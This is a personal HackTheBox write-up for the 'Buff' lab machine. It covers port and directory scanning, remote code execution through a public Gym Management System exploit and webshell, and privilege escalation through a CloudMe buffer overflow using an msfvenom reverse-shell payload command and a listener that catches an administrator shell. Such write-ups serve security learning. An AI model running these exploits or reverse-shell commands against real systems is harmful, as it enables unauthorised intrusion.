Skip to content

Latest commit

 

History

History
198 lines (161 loc) · 7.59 KB

htb-buff-20240831.md

File metadata and controls

198 lines (161 loc) · 7.59 KB
tags
htb

HackTheBox: Buff

These are my notes, and not necessarily a detailed walk-through.

Services

TCP

First, a TCP port scan with nmap:

# Nmap 7.94SVN scan initiated Sat Aug 31 17:07:23 2024 as: nmap -v --reason -Pn -T4 --min-rate 10000 -p- --open -sCV -oN nmap_tcp-buff.htb.txt buff.htb
Nmap scan report for buff.htb (10.10.10.198)
Host is up, received user-set (0.089s latency).
rDNS record for 10.10.10.198: t
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE    REASON          VERSION
7680/tcp open  pando-pub? syn-ack ttl 127
8080/tcp open  http       syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: mrb3n's Bro Hut

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 31 17:08:44 2024 -- 1 IP address (1 host up) scanned in 81.21 seconds

8080/tcp-http

__http-server-header:
Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
__http-open-proxy:
Potentially OPEN proxy.
Methods supported:CONNECTION
__http-title:
mrb3n's Bro Hut
__http-methods:
  Supported Methods: GET HEAD POST OPTIONS

http://buff.htb:8080 [200 OK] Apache[2.4.43], Bootstrap, Cookies[sec_session_id], Country[RESERVED][ZZ], Frame, HTML5, HTTPServer[Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6], HttpOnly[sec_session_id], IP[10.10.10.198], JQuery[1.11.0,1.9.1], OpenSSL[1.1.1g], PHP[7.4.6], PasswordField[password], Script[text/JavaScript,text/javascript], Shopify, Title[mrb3n's Bro Hut], Vimeo, X-Powered-By[PHP/7.4.6], X-UA-Compatible[IE=edge]

Selection of potentially interesting URLs from feroxbuster -u http://buff.htb:8080 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -d1 -k -s 200,301,302:

...
301      GET        9l       30w      337c http://buff.htb:8080/profile => http://buff.htb:8080/profile/
301      GET        9l       30w      336c http://buff.htb:8080/upload => http://buff.htb:8080/upload/

200      GET      168l      486w     7791c http://buff.htb:8080/packages.php
200      GET        1l        2w       15c http://buff.htb:8080/include/process_login.php

200      GET      118l      265w     4169c http://buff.htb:8080/contact.php
200      GET      141l      433w     5337c http://buff.htb:8080/about.php
200      GET      122l      502w     5961c http://buff.htb:8080/facilities.php

301      GET        9l       30w      337c http://buff.htb:8080/include => http://buff.htb:8080/include/
301      GET        9l       30w      337c http://buff.htb:8080/Profile => http://buff.htb:8080/Profile/
200      GET      339l     2953w    18025c http://buff.htb:8080/LICENSE
301      GET        9l       30w      333c http://buff.htb:8080/att => http://buff.htb:8080/att/
301      GET        9l       30w      333c http://buff.htb:8080/IMG => http://buff.htb:8080/IMG/

301      GET        9l       30w      332c http://buff.htb:8080/ex => http://buff.htb:8080/ex/

301      GET        9l       30w      334c http://buff.htb:8080/boot => http://buff.htb:8080/boot/

$ curl 'http://buff.htb:8080/HOME.php'
<br />
<b>Parse error</b>:  syntax error, unexpected '}', expecting ';' or ',' in <b>C:\xampp\htdocs\gym\home.php</b> on line <b>106</b><br />

$ curl http://buff.htb:8080/editp.php -X POST -d "fn=hax"
<br />
<b>Parse error</b>:  syntax error, unexpected '}', expecting ';' or ',' in <b>C:\xampp\htdocs\gym\editp.php</b> on line <b>21</b><br />

I can provoke some errors in various ways, like:

**Warning**: mysqli::__construct(): (HY000/1049): Unknown database 'secure_login' in **C:\xampp\htdocs\gym\ex\include\db_connect.php** on line **3**

And,

: Undefined index: username in <b>C:\xampp\htdocs\gym\ex\profile\i.php

This site is running "Gym Management System 1.0", which has a SQLi vulnerability.

Remote Code Execution

This is https://www.exploit-db.com/exploits/48506.

$ python2 ./x.py http://buff.htb:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun

Privilege Escalation

Here's how I was able to escalate privileges for full control of the system.

$ head 48389.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

Used payload from: msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python

listening on [any] 443 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.198] 49729
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
buff\administrator

Post-exploitation

Life after root.

PS C:\> systeminfo
Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          shaun
Registered Organization:
Product ID:                00329-10280-00000-AA218
Original Install Date:     16/06/2020, 15:05:58
System Boot Time:          28/09/2024, 18:35:32
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
                           [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.23553139.B64.2403260936, 26/03/2024
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-gb;English (United Kingdom)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,455 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,054 MB
Virtual Memory: In Use:    1,745 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.198
                                 [02]: fe80::f153:9dda:f5ce:bddb
                                 [03]: dead:beef::cd48:d0d8:4905:bb02
                                 [04]: dead:beef::f153:9dda:f5ce:bddb
                                 [05]: dead:beef::114
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.